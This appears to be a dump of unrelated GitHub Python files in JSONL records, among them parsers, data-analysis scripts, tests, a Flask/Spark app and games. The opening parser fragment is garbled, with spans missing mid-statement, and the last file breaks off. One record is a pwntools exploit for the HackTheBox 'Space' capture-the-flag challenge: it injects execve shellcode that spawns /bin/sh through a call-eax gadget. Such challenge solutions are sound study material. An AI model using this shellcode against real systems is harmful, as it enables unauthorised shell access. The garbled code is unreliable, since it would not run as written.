PackQuotientBlocks(exp)\n\n exp.expressions = AddMultiplyOperators(exp)\n\n return exp\ndef ParseBlock(input, start_index, depth):\n global expression\n cur_block = Expression.ExpressionBlock()\n i = start_index\n var_last = False\n while ilen(func.name):\n endVariables = ind\n func = f\n #break\n \n if (func == None or endVariables != i): # fügt alle variablen vor der function mit multiply operator hinzu\n for k in range(endVariables-i):\n vars = True\n \n var = word[k]\n \n variableElement = None\n for variableEl in expression.variables:\n if variableEl.variable == var:\n variableElement = variableEl\n break\n if (variableElement == None):\n variableElement = Expression.VariableElement(var)\n expression.variables.append(variableElement)\n \n \n cur_block.append(variableElement)\n if (k!=endVariables-i-1):\n cur_block.append(Expression.multiplyOperator)\n var_last = vars \n if (func != None and vars): # und ggf. auch die function\n cur_block.append(Expression.multiplyOperator)\n cur_block.append(func)\n elif (func != None):\n cur_block.append(func)\n \"\"\" if (func):\n cur_block.append(func)\n else: # produkt von variablen\n for k in range(len(word)):\n var = word[k]\n cur_block.append(VariableElement(var))\n if (k!=(len(word)-1)):\n cur_block.append(multiplyOperator)\"\"\"\n i = endIndex\n i += 1\n \n return cur_block,i\n \ndef getNumber(input, i):\n num = 0\n isnum = True\n iscomma = False\n preComma = []\n comma = []\n index = i\n while isnum and index in einen FunctionBlock um\n '''\n new_expressions = []\n i = 0\n while i= 3)\n cond_RT = (~df['RT'])\n cond_few_percs = ((df['%/syms'] > 2) | (df['%/syms'].isna()))\n cond_dervs = ((df['call#'] > 1) & (df['put#'] > 1))\n\n df_watch = (df[cond_3 & cond_RT & cond_few_percs\n & cond_dervs].copy())\n\n return df_watch\n\n @classmethod\n def _create_df_splits(cls, self, df_watch, **kwargs):\n \"\"\"Create dataframe of splits, strikes, prices.\"\"\"\n watch_rows = (df_watch['text']\n .str.extractall(r'(\\$[A-Z]+.+)')\n .dropna()[0]\n .str.split('|', expand=True))\n\n call_splits = (watch_rows[0].str.strip()\n .str.split(' +', expand=True)\n .drop(columns=[2])\n .rename(columns={0: 'symbol',\n 1: 'callS',\n 3: 'callP'}))\n put_splits = (watch_rows[1].str.strip()\n .str.split(' +', expand=True)\n .drop(columns=[1])\n .rename(columns={0: 'putS',\n 2: 'putP'}))\n\n df_allW = (call_splits.join(put_splits)\n .reset_index(level=1, drop=True)\n .reset_index()\n .rename(columns={'index': 'ogIdx'}))\n\n df_allW['symbol'] = df_allW['symbol'].str.replace('\\$', '', regex=True)\n col_order = ['symbol', 'callP', 'callS', 'putP', 'putS', 'ogIdx']\n df_allW = df_allW[col_order]\n\n return df_allW\n","repo_name":"webclinic017/algotrading-20","sub_path":"twitter/watchlists/watchlist_methods/find_watchlists.py","file_name":"find_watchlists.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12014996051","text":"#!/usr/bin/env python\nimport ROOT\n\nimport ups_mc_model\nUpsMCModel = ups_mc_model.UpsMCModel\n\nimport tools\n\nfrom IPython import embed as shell # noqa\n\nfrom AnalysisPython import LHCbStyle # noqa\n\ndef main():\n canvas = ROOT.TCanvas(\"c_ups\", \"c_ups\", 800, 600)\n cfg = tools.load_config(\"mc\")\n cfg_tuples = tools.load_config(\"tuples\")\n\n utree = ROOT.TChain(\"UpsilonAlg/Upsilon\")\n utree.Add(cfg_tuples[\"mc2011\"][0])\n cut = cfg[\"decays\"][\"ups1s\"][\"ucut\"]\n cut[\"pt_ups\"] = [18, 22]\n cut_str = tools.cut_dict2str(cut)\n\n h = ROOT.TH1D(\"h_ups\", \"h_ups\", 100, 9.2, 9.7)\n utree.Draw(\"m_dtf>>%s\" % h.GetName(), cut_str)\n\n model = UpsMCModel(\n canvas=canvas,\n data=h,\n binning=[100, 9.2, 9.7],\n\n )\n model.fitData()\n print(model)\n tools.save_figure(\"mc/ups1s/ups2011_dcb\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"mazurov/thesis-code","sub_path":"mcups.py","file_name":"mcups.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"11912781347","text":"\"\"\"image manager for the machine learning proyect.\"\"\"\n\nimport os\nimport cv2\nimport multiprocessing as mp\nimport tqdm\n\n\nclass ImageReader():\n \"\"\"Manages input and output of the image dataset.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize class variables.\"\"\"\n self._smalldata_path = \"Dataset/final/\"\n self._fulldata_path = \"Dataset/images/\"\n\n def _save_image(self, image_name):\n author = image_name.split(\"_\")[0]\n image = cv2.imread(self._smalldata_path + image_name)\n if image is None:\n raise Exception(\"Path \\\"{}\\\" is not an image\".format(\n self._smalldata_path + image_name))\n return (image, author)\n\n def open_images_small(self):\n \"\"\"Open images of the resized dataset and saves them to a list.\"\"\"\n image_list = []\n label_list = []\n im_list = os.listdir(self._smalldata_path)\n print(\"Loading images: \")\n pool = mp.Pool(mp.cpu_count())\n\n image_list = pool.map(self._save_image, tqdm.tqdm(im_list))\n pool.close()\n label_list = [elem[1] for elem in image_list]\n image_list = [elem[0] for elem in image_list]\n return image_list, label_list\n\n def open_sample(self):\n \"\"\"Return single image for testing.\"\"\"\n return cv2.imread(self._smalldata_path + \"Andy_Warhol_99.jpg\")\n","repo_name":"AlejandroFernandezLuces/artist_from_art","sub_path":"src/imagereader.py","file_name":"imagereader.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11916636202","text":"from typing import Any\n\nimport pytest\n\nfrom manifestoo_core.manifest import InvalidManifest, Manifest\n\n\n@pytest.mark.parametrize(\n (\"key\", \"value\"),\n [\n (\"name\", \"the name\"),\n (\"name\", None),\n (\"version\", \"1.0.0\"),\n (\"version\", None),\n (\"license\", \"GPL-3\"),\n (\"license\", None),\n (\"development_status\", \"Beta\"),\n (\"development_status\", None),\n (\"depends\", [\"a\", \"b\"]),\n (\"external_dependencies\", {\"python\": [\"httpx\"]}),\n (\"installable\", True),\n (\"installable\", False),\n ],\n)\ndef test_manifest_valid_value(key: str, value: Any) -> None:\n manifest = Manifest.from_dict({key: value})\n assert getattr(manifest, key) == value\n\n\n@pytest.mark.parametrize(\n (\"key\", \"value\"),\n [\n (\"name\", 1),\n (\"version\", 1),\n (\"license\", [\"i\"]),\n (\"development_status\", {}),\n (\"depends\", 1),\n (\"depends\", {}),\n (\"depends\", None),\n (\"external_dependencies\", {1: {}}),\n (\"external_dependencies\", None),\n (\"external_dependencies\", [1]),\n (\"installable\", 1),\n (\"installable\", None),\n ],\n)\ndef test_manifest_invalid_value(key: str, value: Any) -> None:\n manifest = Manifest.from_dict({key: value})\n with pytest.raises(InvalidManifest):\n getattr(manifest, key)\n\n\ndef test_manifest_non_str_keys() -> None:\n with pytest.raises(InvalidManifest):\n Manifest.from_dict({\"name\": \"the name\", 1: \"1\"})\n\n\ndef test_manifest_invalid_syntax() -> None:\n with pytest.raises(InvalidManifest):\n Manifest.from_str('{\"name\": \"the name\", ...}')\n\n\n@pytest.mark.parametrize(\n (\"key\", \"default\"),\n [\n (\"name\", None),\n (\"version\", None),\n (\"license\", None),\n (\"development_status\", None),\n (\"depends\", []),\n (\"external_dependencies\", {}),\n (\"installable\", True),\n ],\n)\ndef test_manifest_default_value(key: str, default: Any) -> None:\n manifest = Manifest.from_dict({})\n assert getattr(manifest, key) == default\n","repo_name":"acsone/manifestoo-core","sub_path":"tests/test_manifest.py","file_name":"test_manifest.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"16064118552","text":"from pwn import * \nimport os \nos.system('clear')\n\ndef start(argv=[], *a, **kw):\n if args.REMOTE:\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else:\n return process([exe] + argv, *a, **kw)\n\nexe = './space'\nelf = context.binary = ELF(exe, checksec=True)\ncontext.log_level = 'DEBUG'\n\nsh = start()\ncall_eax = 0x08049019\nlog.info('CALL_EAX gadget --> %#0x', call_eax)\n\n# 8 bytes\n# we can't do mov eax, 0xb. Because the length shall be 10\n# why 11?? Because distance from first A to last A is 11 \n# it will loop through the last offset before 8 bytes space\nfirst_shell = \"\"\"\nxor ecx, ecx\npush ecx\npush 0xb \npop eax\njmp $+11\n\"\"\"\nshell_1 = asm(first_shell)\nprint('[INFO] --> LENGTH SHELL 1',len(shell_1))\n\n# 18 bytes\n# adding 2 NOPs as paddings so our shellcode length shall be exact 18.\nsecond_shell = \"\"\"\nxor edx, edx\npush 0x68732f2f # //sh\npush 0x6e69622f # bin\nmov ebx, esp\nint 0x80\nnop \nnop \n\"\"\"\nshell_2 = asm(second_shell)\nprint('[INFO] --> LENGTH SHELL 2',len(shell_2))\n\np = flat([\n shell_2,\n call_eax,\n shell_1\n])\n\nsh.sendlineafter(b'>',p)\nsh.interactive()\n","repo_name":"jon-brandy/hackthebox","sub_path":"Categories/Pwn/Space/ret2shell_space.py","file_name":"ret2shell_space.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"42233449815","text":"from sys import stdin\n\nn = int(stdin.readline())\ngraph = [0] * 1001\nmax_x = 0\nmax_y = 0\nfor _ in range(n):\n x, y = map(int, stdin.readline().split())\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n graph[x - 1] = y\n\nindex = graph.index(max_y) # 최댓값의 인덱스\ncheck = 0\nresult = 0\n\n# 최댓값의 인덱스까지\nfor i in range(index):\n check = max(check, graph[i]) # 최대 높이가 변하면 갱신\n result += check # 최대 높이 만큼 더해주기\ncheck = 0\n\n# 끝에서 최대값의 인덱스 까지\nfor i in range(max_x, index, -1):\n check = max(check, graph[i]) # 최대 높이가 변하면 갱신\n result += check # 최대 높이 만큼 더해주기\n\nprint(result + max_y) # 결과값 + 최대높이\n","repo_name":"nzkim1234/Algorithm","sub_path":"BOJ/2304.py","file_name":"2304.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6897491461","text":"import numpy as np\nfile = open(\"./test.csv\")\ncsvFile = np.loadtxt(file, delimiter=\",\", skiprows=0)\nn = csvFile.shape[0]\nA = np.ones((n,2))\nA[:,0] = csvFile[:,0]\nB = csvFile[:,1]\n\nM = csvFile[:,0:2]\nR = np.corrcoef(M, rowvar = False)[0,1]\nprint(\"R^2:\",R*R)\n\nQ, R = np.linalg.qr(A, mode='complete')\nQTB = (Q.T.dot(B))\nB0 =QTB[1]/R[1,1]\nB1 = (QTB[0]-R[0,1]*B0)/R[0,0]\nprint(\"B0:\",B0)\nprint(\"B1:\",B1)\n\n# Get complement\nA[:,0] = csvFile[:,1]\nB = csvFile[:,0]\n\nQ, R = np.linalg.qr(A, mode='complete')\nQTB = (Q.T.dot(B))\nB0 =QTB[1]/R[1,1]\nB1 = (QTB[0]-R[0,1]*B0)/R[0,0]\nprint(\"B0':\",B0)\nprint(\"B1':\",B1)\n\nsig = np.cov(M, rowvar=False, bias= True)\nprint(\"xy:\",sig[0][1])\nprint(\"y^2:\",sig[1,1])\n\n","repo_name":"ramnreddy15/ML-Course","sub_path":"Unit1/.ipynb_checkpoints/1-Green-01-checkpoint.py","file_name":"1-Green-01-checkpoint.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23660342130","text":"import datasets\nimport numpy as np\nfrom minichain import EmbeddingPrompt, TemplatePrompt, start_chain\nimport json\n\ndata = datasets.load_dataset(\"xyzNLP/nza-ct-zoning-codes-text\")\n\nd = data[\"train\"].filter(lambda x: x[\"Town\"] == \"madison\")\nd.add_faiss_index(\"embeddings\")\n\nclass KNNPrompt(EmbeddingPrompt):\n def parse(self, out, inp):\n res = self.data.get_nearest_examples(\"embeddings\", np.array(out), 3)\n docs = [(t.replace(\"CELL (\", f\"CELL C{p} (\"), p)\n for t, p in zip(res.examples[\"Text\"],\n res.examples[\"Page\"])]\n return {\"docs\": docs}\n\nclass DistrictsPrompt(TemplatePrompt):\n template_file = \"districts.pmpt.tpl\"\n \ndef get_districts(d):\n with start_chain(\"districts\") as backend:\n prompt = KNNPrompt(backend.OpenAIEmbed(), d).chain(DistrictsPrompt(backend.OpenAI(max_tokens=512 + 128)))\n result = prompt(\"table of contents residential commercial business zoning districts district below 1 family multi family permit\")\n print(\"The Districts in the town are:\", json.loads(result))\n \n return json.loads(result)\n\nclass MultiFamilyPrompt(TemplatePrompt):\n template_file = \"lot_area.pmpt.tpl\"\n\ndef get_multifamily(d, districts):\n with start_chain(\"allowed\") as backend:\n knn = KNNPrompt(backend.OpenAIEmbed(), d)\n prompt = MultiFamilyPrompt(backend.OpenAI(max_tokens=256))\n for x in districts:\n \n out = knn(f\"Section XX and table about zoning district called {x['T']} with title {x['Z']} Minimum Lot Area Front Setback Maximum Building Height\")\n result = prompt({\"docs\": out[\"docs\"], \"zone_name\": x['T'], \"zone_abbreviation\": x['Z']})\n print(\"District\", x['T'], result)\n\n# districts = get_districts(d)\ndistricts = [{\"Z\": \"Affordable Housing Distrct\", \"T\": \"AHD\"}]\nget_multifamily(d, districts)\n","repo_name":"National-Zoning-Atlas/zoning-gpt","sub_path":"zoning/district_extraction/districts_sizes.py","file_name":"districts_sizes.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"31346212902","text":"import os\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\n\ndef _handle_dirs(pathname, foldername, subfoldername):\n path = Path(pathname)\n if foldername is not None:\n path = path / foldername\n if not os.path.isdir(path):\n os.mkdir(path)\n if subfoldername is not None:\n path = path / subfoldername\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n\nFIG_PATH = Path(__file__).parent.parent.parent.parent\nFIG_PATH = FIG_PATH / \"results\"\nFIG_PATH = FIG_PATH / \"figs\"\n\nOUT_PATH = Path(__file__).parent.parent.parent.parent\nOUT_PATH = OUT_PATH / \"results\"\nOUT_PATH = OUT_PATH / \"outputs\"\n\n\ndef savefig(\n name,\n format=\"png\",\n dpi=300,\n foldername=None,\n subfoldername=None,\n pathname=FIG_PATH,\n bbox_inches=\"tight\",\n pad_inches=0.5,\n save_on=True,\n transparent=False,\n print_out=False,\n **kws,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".\" + format)\n plt.savefig(\n savename,\n format=format,\n facecolor=\"white\",\n transparent=transparent,\n bbox_inches=bbox_inches,\n pad_inches=pad_inches,\n dpi=dpi,\n **kws,\n )\n if print_out:\n print(f\"Saved figure to {savename}\")\n\n\ndef get_out_dir(foldername=None, subfoldername=None, pathname=OUT_PATH):\n path = _handle_dirs(pathname, foldername, subfoldername)\n return path","repo_name":"bdpedigo/networks-course","sub_path":"pkg/pkg/io/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"35702920845","text":"#!/usr/bin/python3\n\nimport boto3\nimport botocore\nimport logging\nimport json\nimport pprint\nimport requests\nimport sys\nimport cloudprovider\n\n\nclass CloudProviderAws( cloudprovider.CloudProvider ):\n\n def __init__( self, regionGeoInfo, dateFormatFunction ):\n super().__init__( regionGeoInfo, dateFormatFunction )\n\n\n def getDataSources(self):\n if self._mostRecentUpdate is None:\n self.getRegions()\n\n return [\n {\n 'description': 'AWS Systems Manager Parameter Store',\n 'updated_timestamp': self._dateFormatFunction( self._mostRecentUpdate )\n },\n ]\n\n\n def getRegions(self):\n if self._regions is not None:\n return self._regions\n \n try:\n awsSsmClient = boto3.client( 'ssm', region_name=self._getEc2Region() )\n except e:\n logging.critical( \"Exception thrown when trying to establish SSM client connection, error: {0}\".format(e) )\n sys.exit(1)\n\n try:\n regionQueryPath = \"/aws/service/global-infrastructure/regions\"\n\n moreResults = True\n queryToken = None\n regionList = []\n\n while moreResults is True:\n if queryToken is None:\n #logging.debug(\"Getting params with no token\")\n ssmResults = awsSsmClient.get_parameters_by_path( Path=regionQueryPath )\n else:\n #logging.debug( \"Getting params with token {0}\".format(queryToken) )\n ssmResults = awsSsmClient.get_parameters_by_path( Path=regionQueryPath, NextToken=queryToken )\n\n resultParams = ssmResults['Parameters']\n\n for currParam in resultParams:\n regionList.append( currParam['Value'] )\n #print( \"Param data for {0}:\\n{1}\".format(currParam['Value'], pprint.pformat(currParam, indent=4)))\n if self._mostRecentUpdate is None:\n self._mostRecentUpdate = currParam['LastModifiedDate']\n else:\n if currParam['LastModifiedDate'] > self._mostRecentUpdate:\n self._mostRecentUpdate = currParam['LastModifiedDate']\n\n if 'NextToken' in ssmResults and len(ssmResults['NextToken']) > 0:\n moreResults = True\n queryToken = ssmResults['NextToken']\n else:\n moreResults = False\n queryToken = None\n\n except botocore.exceptions.ClientError as e:\n logging.error(\"Error when requesting regions list: {0}\".format(e) )\n sys.exit(1)\n\n \n regionList.sort()\n\n self._regions = {}\n\n for currRegionName in regionList:\n #logging.info(\"working {0}\".format(currRegionName))\n #print(\"region Geo info:\\n{0}\".format(self._regionGeoInfo))\n self._regions[ currRegionName ] = self._regionGeoInfo[currRegionName]\n\n\n logging.info( \"Leaving getRegions\" )\n\n return self._regions\n\n\n def _getEc2Region(self):\n requestResult = requests.get( 'http://169.254.169.254/latest/dynamic/instance-identity/document' )\n #logger.debug( \"Back from requests.get\" )\n jsonDocument = requestResult.json()\n awsRegion = jsonDocument['region']\n logging.info( \"Script running in AWS region {0}\".format(awsRegion) )\n\n return awsRegion\n","repo_name":"globalwatchpost/CloudRegionsList","sub_path":"site_generation/cloudprovider_aws.py","file_name":"cloudprovider_aws.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1018200641","text":"from flask import *\nimport requests\nimport pandas as pd\nfrom pyspark.context import SparkContext\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql import SQLContext\nimport re\n\n\nsc = SparkContext('local')\nsqlContext = SQLContext(sc)\nspark = SparkSession(sc)\n\nurl = 'https://ds-demo-c0812.firebaseio.com/data_engineer.json'\nresponse = requests.get(url)\ndict_eng = response.json()\neng_df = pd.read_json(json.dumps(dict_eng))\n\neng_spark_df = sqlContext.createDataFrame(eng_df)\n\neng_df = eng_spark_df.toPandas()\n\ndef salary_range(df, sal):\n ############################################################\n # Method: salary_range(df, sal)\n # input: \n # df: a pandas df\n # sal: the target salary input by user\n # return:\n # A new pandas df with extra needed columns\n ##################### Psuedo Code ##########################\n # read a df with df['Salary Estimate']==xxK-xxK\n # replace K with 000, split by \"-\", to int, append to lists\n # append to df['lower'] & df['uppeer']\n # check upper and lower and boolean df['inRange']\n # to spark and filter, toPandas and return\n lower = []\n upper = []\n for i in range(len(df)):\n tmp = df['Salary Estimate'][i]\n tmp2 = tmp.replace('K', '000')\n sal_range = re.split('\\\\$|-',tmp2) # s[1]&s[3] are numbers\n lower.append(sal_range[1])\n upper.append(sal_range[3])\n\n df['lower'] = lower\n df['upper'] = upper\n inRange = []\n #salcheck = [] # debug use\n for j in range(len(df)):\n if( (sal>=float(df['lower'][j])) & (sal<=float(df['upper'][j])) ):\n inRange.append(True)\n #salcheck.append(type(sal)) # debug use\n else:\n inRange.append(False)\n\n df['inRange'] = inRange\n #df['debug'] = salcheck # debug use\n tmp_spark_df = sqlContext.createDataFrame(df)\n tmp2_spark_df = tmp_spark_df.filter(tmp_spark_df['inRange']==True).select('Company Name','Salary Estimate','Location','Size','Sector')\n new_df = tmp2_spark_df.toPandas()\n return new_df\n\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\n\ndef basic():\n if request.method == 'POST':\n if request.form['submit'] == 'overview':\n test = request.form['name']\n try:\n num = int(test)\n eng_spark_head_df = eng_spark_df.select('Company Name','Salary Estimate','Location','Size','Sector').limit(num)\n eng_head_df = eng_spark_head_df.toPandas()\n eng_head_df['Company Name'] = eng_head_df['Company Name'].str.slice(0,-4,1)\n eng_head_df['Salary Estimate'] = eng_head_df['Salary Estimate'].str.slice(0,-17,1)\n eng_head_df = eng_head_df.replace('-1', 'Unknown')\n return render_template('index.html', tables=[eng_head_df.to_html(classes='data')], titles=eng_head_df.columns.values)\n except:\n return render_template('index.html',tables=[\"Please enter a positive integer.\"], titles=None)\n \n elif request.form['submit'] == 'location':\n name = request.form['name']\n # Use spark to select all location == input\n # remember to remove the limit \n eng_spark_location_df = eng_spark_df.filter(eng_spark_df[\"Location\"]==name).select('Company Name','Salary Estimate','Location','Size','Sector')#.limit(30)\n eng_location_df = eng_spark_location_df.toPandas()\n # Perform necessary data cleaning for readability\n eng_location_df['Company Name'] = eng_location_df['Company Name'].str.slice(0,-4,1)\n eng_location_df['Salary Estimate'] = eng_location_df['Salary Estimate'].str.slice(0,-17,1)\n eng_location_df = eng_location_df.replace('-1', 'Unknown')\n eng_location_lst = eng_location_df.values.tolist()\n #output=[['Company Name','Salary Range','Location','Company Size']]\n #for item in eng_location_lst:\n # output.append(item)\n if eng_location_lst==[]:\n return render_template('index.html',tables=[\"No match or invalid input!\"], titles=None)\n\n return render_template('index.html', tables=[eng_location_df.to_html(classes='data')], titles=eng_location_df.columns.values)\n \n elif request.form['submit'] == 'salary':\n salary = request.form['name']\n # check if input is a number, if not, return\n try:\n checkFormat = float(salary)\n except:\n return render_template('index.html',tables=['Invalid input! Please enter a number.'], titles=None)\n # Use spark to select all location == input\n eng_spark_salary_df = eng_spark_df.select('Company Name','Salary Estimate','Location','Size','Sector')\n eng_salary_df = eng_spark_salary_df.toPandas()\n # Perform necessary data cleaning for readability\n eng_salary_df['Company Name'] = eng_salary_df['Company Name'].str.slice(0,-4,1)\n eng_salary_df['Salary Estimate'] = eng_salary_df['Salary Estimate'].str.slice(0,-17,1)\n eng_salary_df = eng_salary_df.replace('-1', 'Unknown')\n # Find suitable salary range\n eng_new_salary_df = salary_range(eng_salary_df, float(salary))\n eng_salary_lst = eng_new_salary_df.values.tolist()\n #output=[['Company Name','Salary Range','Location','Company Size']]\n #for item in eng_salary_lst:\n # output.append(item)\n if eng_salary_lst==[]:\n return render_template('index.html',tables=[\"No match!\"], titles=None)\n \n return render_template('index.html',tables=[eng_new_salary_df.to_html(classes='data')], titles=eng_new_salary_df.columns.values)\n\n elif request.form['submit'] == 'sector':\n name = request.form['name']\n # Use spark to select all location == input\n eng_spark_sector_df = eng_spark_df.filter(eng_spark_df[\"Sector\"]==name).select('Company Name','Salary Estimate','Location','Size','Sector')\n eng_sector_df = eng_spark_sector_df.toPandas()\n # Perform necessary data cleaning for readability\n eng_sector_df['Company Name'] = eng_sector_df['Company Name'].str.slice(0,-4,1)\n eng_sector_df['Salary Estimate'] = eng_sector_df['Salary Estimate'].str.slice(0,-17,1)\n eng_sector_df = eng_sector_df.replace('-1', 'Unknown')\n eng_sector_lst = eng_sector_df.values.tolist()\n if eng_sector_lst==[]:\n return render_template('index.html', tables=[\"No match or be more specific.\",\"For example: Finance, Infromation Technology, etc.\"], titles=None)\n\n return render_template('index.html',tables=[eng_sector_df.to_html(classes='data')], titles=eng_sector_df.columns.values)\n\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"haonanxu21/DSCI551-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13951903476","text":"import re\n\n# 下面讲解三个主要的re函数:re.match和re.search()以及re.compile()函数\n# 下面的内容可以直接去看自己当时写过的博客\ncontent = 'Hello 123 4567 World_This is a Regex Demo'\nresult1 = re.match('Hello\\s\\d{3}\\s\\d{4}\\s\\w{10}', content)\nprint(result1)\n# group()在正则表达式中用于获取分段截获的字符串\nprint(result1.group())\nprint(result1.span())\n\n# 下面是re.search函数,改进了re.match只能从字符串的一开始进行查找匹配的字符串,\n# 而re.search是从头开始,在整个字符串中查找,找到则立马停止。\nline = \"Cats are smarter than dogs\"\nmatchObj1 = re.match(r'dogs', line, re.M | re.I)\nif matchObj1:\n print(matchObj1.group())\nelse:\n print(\"No match!!\")\nmatchObj2 = re.search(r'dogs', line, re.M | re.I)\nprint(matchObj2.group())\n\ns = 'A B C D'\nresult2 = re.compile('\\w+\\s+\\w?').findall(s)\nprint(result2)\n\nresult3 = re.compile('(\\w+\\s+)\\w?').findall(s)\nprint(result3)\n\ntest_str = '''\n\n\n\n\n\n'''\n# 想要得到上面name和value对的数据,使用正则表达式就非常容易得到了\nresult3 = re.compile(' 1:\n return\n if guessedLetter.guess in self.wordToGuess:\n self.lastLetterGuessedCorrectly = True\n charIdx = 0\n numInstances = 0\n gameWon = True\n for charIdx in range(len(self.wordToGuess)):\n if self.wordToGuess[charIdx] == guessedLetter.guess:\n self.currGuessedWord[charIdx] = guessedLetter.guess\n numInstances += 1\n if self.currGuessedWord[charIdx] != self.wordToGuess[charIdx]:\n gameWon = False\n charIdx += 1\n self.gameWon = gameWon\n self.gameOver = self.gameWon\n guessedLetter.numOccurences = numInstances\n else: # wrong guess!\n self.incorrectGuessedLetters.append(guessedLetter.guess)\n self.incrementNumIncorrectGuesses()\n if self.numIncorrectGuesses >= 6:\n self.gameOver = True\n assert (self.gameWon is False)\n self.incrementNumberOfGuesses()\n return\n\n def incrementNumIncorrectGuesses(self):\n self.numIncorrectGuesses += 1\n\n def incrementNumberOfGuesses(self):\n self.numOfGuesses += 1\n\n def __str__(self):\n # print the hangman graphic\n retVal = hangmanGraphics[self.numIncorrectGuesses]\n # print the currently guessed word\n retVal += \"\\n\" + self.printCurrGuessedWord()\n retVal += \"\\n\" + self.printDashes()\n retVal += \"\\n\" + \"Number of guesses remaining: {}\".format(str(6 - self.numIncorrectGuesses))\n retVal += \"\\n\" + \"Letters already guessed: {}\".format(str(self.incorrectGuessedLetters))\n return retVal\n\n\nclass Gallow:\n head = 'o'\n body = '||'\n leftArm = '-'\n rightArm = '-'\n leftLeg = '/'\n rightLeg = '\\\\'\n maxNumMistakes = 6\n\n def __init__(self):\n self.numMistakes = 0\n\n def __str__(self):\n \"\"\"\n @TODO implement\n :return:\n \"\"\"\n pass\n # retVal = gallow\n if self.numMistakes == 0:\n return \"\"\n elif self.numMistakes == 1:\n return\n\n\nclass Guess:\n def __init__(self, guess):\n self.guess = guess\n self.correct = False\n\n\nclass WordGuess(Guess):\n def __init__(self, guessedWord):\n super().__init__(guessedWord)\n self.sizeDifferenceFromWordToGuess = 0\n\n def printIncorrectGuess(self):\n print(\"{} is not \".format(self.guess))\n\n\nclass LetterGuess(Guess):\n def __init__(self, guessedLetter):\n super().__init__(guessedLetter)\n self.numOccurences = 0\n self.wasAlreadyGuessed = True\n\n def incrementNumOccurences(self):\n self.numOccurences += 1\n\n def printIncorrectGuess(self):\n print(\"{} is not the word I'm looking for!\".format(self.guess))\n\n\ndef driver():\n while True:\n system('clear')\n print(\"Welcome to hangman!\")\n hangman = Hangman(processWordInput())\n print(hangman)\n currGuess = object()\n while not hangman.gameOver:\n letterOrWordGuessInput = processLetterInput(\"Enter a letter to guess or -wg to \"\n \"guess a complete word/phrase: \")\n if letterOrWordGuessInput == \"--wordguess\" or letterOrWordGuessInput == \"-wg\":\n wordGuess = processWordInput()\n currGuess = WordGuess(wordGuess)\n else:\n currGuess = LetterGuess(letterOrWordGuessInput)\n hangman.processGuess(currGuess)\n # clear terminal\n system('clear')\n print(hangman)\n print(\"\")\n if hangman.gameWon:\n print(\"You won!\")\n else:\n print(\"You lost :(\")\n print(\"\\nThe word was *** {} ***\".format(hangman.wordToGuess.upper()))\n wantToPlayAgain = processLetterInput((\"Would you like to play again? [y/n]: \"))\n if wantToPlayAgain.lower() == 'n':\n break\n\n\nif __name__ == '__main__':\n driver()\n","repo_name":"scomora/Hangman","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7767292198","text":"from classes.node import Node\n\nclass PriorityQueue:\n\n def __init__(self, root=None):\n self.arr = []\n self.size = 0\n\n def add(self, value):\n\n self.arr.append(value)\n self.size += 1\n current_index = self.size - 1\n\n while current_index > 0:\n parent_index = (current_index - 1) // 2\n\n if self.arr[parent_index] < self.arr[current_index]:\n break\n\n self.arr[parent_index], self.arr[current_index] = self.arr[current_index], self.arr[parent_index]\n current_index = parent_index\n\n def poll(self):\n\n if self.size == 0:\n return\n\n self.arr[0], self.arr[self.size - 1] = self.arr[self.size - 1], self.arr[0]\n value = self.arr.pop()\n self.size -= 1\n\n if self.size > 0:\n self.heapify(0)\n\n print(value)\n\n def heapify(self, current_index):\n\n if not self.is_leaf(current_index):\n left_child = 2 * current_index + 1\n right_child = 2 * current_index + 2\n\n if right_child < self.size:\n if self.arr[right_child] < self.arr[current_index] or self.arr[left_child] < self.arr[current_index]:\n if self.arr[right_child] < self.arr[left_child]:\n self.arr[right_child], self.arr[current_index] = self.arr[current_index], self.arr[right_child]\n self.heapify(right_child)\n else:\n self.arr[left_child], self.arr[current_index] = self.arr[current_index], self.arr[left_child]\n self.heapify(left_child)\n else:\n if self.arr[left_child] < self.arr[current_index]:\n self.arr[left_child], self.arr[current_index] = self.arr[current_index], self.arr[left_child]\n self.heapify(left_child)\n\n def is_leaf(self, current_index):\n\n if current_index >= self.size // 2 